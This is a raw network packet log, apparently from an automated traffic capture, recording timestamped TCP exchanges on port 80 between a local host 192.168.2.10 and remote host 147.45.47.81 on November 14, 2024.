                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377720118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377732038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377741098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377751112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377753019 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377759933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377779961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.379482031 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.379750013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.381500959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.409985065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413501024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413537979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413561106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413570881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413585901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413595915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413626909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413628101 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413681984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413693905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413723946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413733959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413749933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.413774967 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.415235996 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.442404985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.442425013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.442436934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.442702055 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469598055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469619036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469631910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469641924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469655991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469688892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469738007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469749928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469774961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.469863892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494070053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494245052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494255066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494265079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494273901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494288921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494299889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494302034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494309902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494319916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494329929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494337082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494337082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494339943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494349003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494354010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494359970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494364023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494366884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494374037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494384050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494386911 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494404078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494565010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494575977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494584084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494592905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494594097 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494604111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494611979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494613886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494621992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494626045 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494631052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494645119 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494688988 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494703054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494719982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494729996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494735003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494740009 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494745016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494749069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494760990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494765997 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494770050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494780064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494781017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494790077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494801044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494807005 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494807005 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494812965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494817019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494826078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494836092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494839907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494848967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494858027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494863987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494867086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494875908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494884014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494887114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494894981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494904995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494914055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494915962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494924068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494930983 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494951010 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494955063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494965076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494977951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.494982004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495013952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495023966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495093107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495120049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495162010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495172024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495182037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495204926 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495332003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495342016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495352030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495358944 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495359898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495368958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495373011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495379925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495394945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495404005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495405912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495413065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495421886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495429039 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495431900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495440960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495446920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495450974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495460033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495464087 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495469093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495470047 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495479107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495487928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495496988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495506048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495516062 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495516062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495532036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495532036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495532036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495542049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495551109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495559931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495560884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495568991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495578051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495579958 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495587111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495593071 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495603085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495805025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495815039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495824099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495831013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495840073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495848894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495857000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495858908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495868921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495883942 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495956898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495965958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495974064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495981932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495982885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.495991945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496001005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496006966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496012926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496026039 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496064901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496268034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496279001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496287107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496295929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496309996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496319056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496329069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496337891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496346951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496357918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496361971 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496366978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496376038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496382952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496383905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496392965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496397972 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496402979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496412039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496417046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496421099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496431112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496436119 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496440887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496448040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496453047 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496458054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496467113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496469021 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496476889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496485949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496486902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496495008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496504068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496507883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496514082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496572971 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496695042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496695042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496722937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496733904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496743917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496772051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496782064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496789932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496795893 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496799946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496814013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496874094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496884108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496892929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496901989 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496902943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496917963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496926069 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496927977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496937990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496944904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496947050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.496959925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.497886896 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.505513906 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532325983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532337904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532347918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532406092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532416105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532424927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532432079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532434940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532447100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532469034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532649040 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532922983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532932997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532942057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532951117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532962084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.532972097 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.533108950 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.558621883 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.561047077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.561074972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.561084986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.561166048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.561166048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563615084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563627958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563638926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563649893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563662052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563672066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563683033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563700914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563711882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563721895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563731909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.563743114 CET8049957147.45.47.81192.168.2.10
